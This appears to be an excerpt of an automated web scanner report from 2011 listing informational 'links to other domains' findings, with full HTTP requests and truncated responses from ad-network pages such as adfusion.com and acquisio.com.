<li><a href='http://sitetuners.wordpress.com/' rel='nofollow'>SiteTuners Blog</a>
...[SNIP]...
<li><a href='http://blog.vkistudios.com/' rel='nofollow'>VKI Studios Blog</a>
...[SNIP]...
<li><a href='http://www.websharedesign.com/conversion-marketing-blog/' rel='nofollow'>WebShare Blog</a>
...[SNIP]...
<li><a href='http://www.widerfunnel.com/blog/' rel='nofollow'>WiderFunnel Blog</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=LinkList&widgetId=LinkList3&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("LinkList3"));' target='configLinkList3' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<li><a href='https://adwords.google.com/select/Login?sourceid=awo&subid=na-en-et-analytics_blog&medium=link'>Google AdWords</a>
...[SNIP]...
<li><a href='http://www.google.com/adsense?hl=en&sourceid=aso&subid=na-en-et-ET111_WebsiteOptimizer_Blog&medium=et'>Google AdSense</a>
...[SNIP]...
<li><a href='http://www.google.com/analytics'>Google Analytics</a>
...[SNIP]...
<li><a href='http://www.google.com/webmasters'>Google Webmaster Central</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=LinkList&widgetId=LinkList2&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("LinkList2"));' target='configLinkList2' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
</script>
<script src="http://www.google.com/reader/public/javascript-sub/user/10949413115399023739/label/ads?callback=build_posts" type="text/javascript"></script>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=HTML&widgetId=HTML2&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML2"));' target='configHTML2' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<br/>The Official Google Website Optimizer Blog is powered by Blogger. <a href="http://www.blogger.com/">Start your own weblog</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=HTML&widgetId=HTML5&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML5"));' target='configHTML5' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<div class='widget-content'>
<a href='http://www.blogger.com'><img alt='Powered By Blogger' src='http://www.blogger.com/buttons/blogger-simple-blue.gif'/></a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=BloggerButton&widgetId=BloggerButton1&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("BloggerButton1"));' target='configBloggerButton1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<div class='widget-content'>
Visit our <a href="http://www.google.com/press/blogs/directory.html#tab0"> directory</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=HTML&widgetId=HTML6&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML6"));' target='configHTML6' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<br/>
<a href="http://www.google.com/privacy.html">Privacy Policy</a> |
    <a href="http://www.google.com/terms_of_service.html">Terms of Service</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=HTML&widgetId=HTML1&action=editWidget&sectionId=footer' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML1"));' target='configHTML1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/1019049897-widgets.js"></script>
...[SNIP]...
10.177. http://wptz.placelocal.com/_js/ad.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/ad.js.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /_js/ad.js.php?clientID=7cbbc409ec990f19c78c75bd1e06f215&adWidth=300&adHeight=250&campaign_api=dispCamp.getNextCampaign&api_url=api.placelocal.com&domain_name=wptz.placelocal.com&tracking_url=tracking.placelocal.com HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:30:51 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:30:51 GMT
Vary: Accept-Encoding
Content-Length: 11049

var scripts_60mie0 = document.getElementsByTagName('script');var scriptEl_60mie0 = scripts_60mie0[ scripts_60mie0.length - 1 ];var scriptParent_60mie0 = scriptEl_60mie0.parentNode;var queryString_60mi
...[SNIP]...
OMContentLoaded', init, false);
/* for Internet Explorer*/
/*@cc_on @*/
/*@if (@_win32)
document.write('<script id=__ie_onload defer src=//0><\/scr'+'ipt>
...[SNIP]...
10.178. http://www.acquisio.com/wp-content/plugins/ilc-folding/folding.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acquisio.com
Path:   /wp-content/plugins/ilc-folding/folding.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wp-content/plugins/ilc-folding/folding.js?ver=3.0 HTTP/1.1
Host: www.acquisio.com
Proxy-Connection: keep-alive
Referer: http://www.pagevester.com/en/product/Google-Website-Optimizer.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 00:18:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Vary: Cookie
X-Pingback: http://www.acquisio.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 09 Apr 2011 00:18:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<li id="menu-item-3547" class="menu-item menu-item-type-custom"><a href="https://www.clientcampaigns.com/">Client Login</a>
...[SNIP]...
<li>
                           <a target="_blank" href="http://twitter.com/home?status=PPC%20Management%20Software%20-%20http%3A%2F%2Fwww.acquisio.com%2Fppc-management-software%2F">
                           <img src="http://www.acquisio.com/wp-content/themes/acquisio/images/twitterWid.png" alt="" border="0"/>
...[SNIP]...
<li>
                           <a target="_blank" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.acquisio.com%2Fppc-management-software%2F&t=PPC%20Management%20Software"><img src="http://www.acquisio.com/wp-content/themes/acquisio/images/facebookWid.png" alt="" border="0"/>
...[SNIP]...
<li>
                           <a target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.acquisio.com%2Fppc-management-software%2F&title=PPC%20Management%20Software&source=Acquisio+The+PPC+Management+Software+for+Agencies&summary=Jump%20on%20board%20the%20world%27s%20leading%20PPC%20Management%20Software%20for%20agencies%20and%20immediately%20start%20maximizing%20campaign%20results%2C%20saving%20huge%20amounts%20of%20time%2C%20basically%20start%20running%20a%20more%20profitable%20business.%0D%0A%0D%0AMulti-Awesome%0D%0A%0D%0AAcquisio%20SEARCH%20is%20more%20tha">
                           <img src="http://www.acquisio.com/wp-content/themes/acquisio/images/linkedinWid.png" alt="" border="0"/>
...[SNIP]...
</script>
                           <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=acquisio" class="addthis_button_compact">
                               <img src="http://www.acquisio.com/wp-content/themes/acquisio/images/emailWid.png" alt="" border="0"/>
...[SNIP]...
</a>
                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=acquisio"></script>
...[SNIP]...
<div id="social-icons">
                       <a href="http://www.facebook.com/acquisio"><img src="http://www.acquisio.com/wp-content/themes/acquisio/images/social/48x48/facebook.png" /></a>
                       <a href="http://feeds.feedburner.com/AcquisioBlog"><img src="http://www.acquisio.com/wp-content/themes/acquisio/images/social/48x48/feed.png" /></a>
                       <a href="http://twitter.com/acquisio"><img src="http://www.acquisio.com/wp-content/themes/acquisio/images/social/48x48/twitter.png" />
...[SNIP]...
</script>


<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<!-- TTD Retargeting Pixel -->
<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://ad.adsrvr.org/container/7j9i29e.1.html"></iframe>
...[SNIP]...
10.179. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 15:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 15:35:11 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222837-APP11">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222837-APP11">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222837-APP11">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222837-APP11">Do you qualify for online debt relief?</a>
...[SNIP]...
10.180. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:58 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=8355cccd-c024-4752-b653-5cfe292a9982; expires=Sun, 09-Oct-2011 12:29:58 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=168069-APP5">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=168069-APP5">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=168069-APP5">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=168069-APP5">Do you qualify for online debt relief?</a>
...[SNIP]...
10.181. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 14:14:20 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 14:14:20 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222839-APP13">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222839-APP13">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222839-APP13">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222839-APP13">Do you qualify for online debt relief?</a>
...[SNIP]...
10.182. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 14:34:33 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 14:34:33 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222840-APP14">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222840-APP14">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222840-APP14">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222840-APP14">Do you qualify for online debt relief?</a>
...[SNIP]...
10.183. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:53:32 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 12:53:32 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=168068-APP4">Secrets car insurance companies don&#39;t want you to know</a>
